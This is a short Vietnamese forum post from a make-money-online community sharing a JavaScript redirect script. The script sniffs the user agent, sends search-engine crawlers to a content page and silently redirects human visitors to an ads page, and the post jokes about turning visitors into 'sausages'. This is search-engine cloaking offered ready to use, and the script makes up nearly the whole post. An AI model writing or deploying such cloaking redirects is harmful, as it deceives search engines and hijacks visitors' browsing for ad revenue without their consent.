Cafemmo Club
← Quay lại danh sách

Script redirect visitor - Heo tự động chạy vào và mình sẽ có xúc xích :v

gu gồ02/11/2017391 lượt xem10 bình luận

file ads.html sẽ tạo xúc xích cho bạn, quan trọng là bạn làm cái máy chế tạo xúc xích này kiểu gì thôi =))

<script type="text/javascript"> var isRedirected = false; function redirect() { if (!isRedirected) { isRedirected = true; var userAgent = navigator.userAgent.toLowerCase(); var isBot = /bot|googlebot|crawler|spider|robot|crawling/i.test(userAgent); if (!isBot) window.location.replace("http://domain-a.com/ads.html"); else window.location.replace("https://domain-b.com/content.html"); } } function load() { setTimeout(redirect, 100); } </script>

Bình luận

Đang tải...

Đang kiểm tra đăng nhập...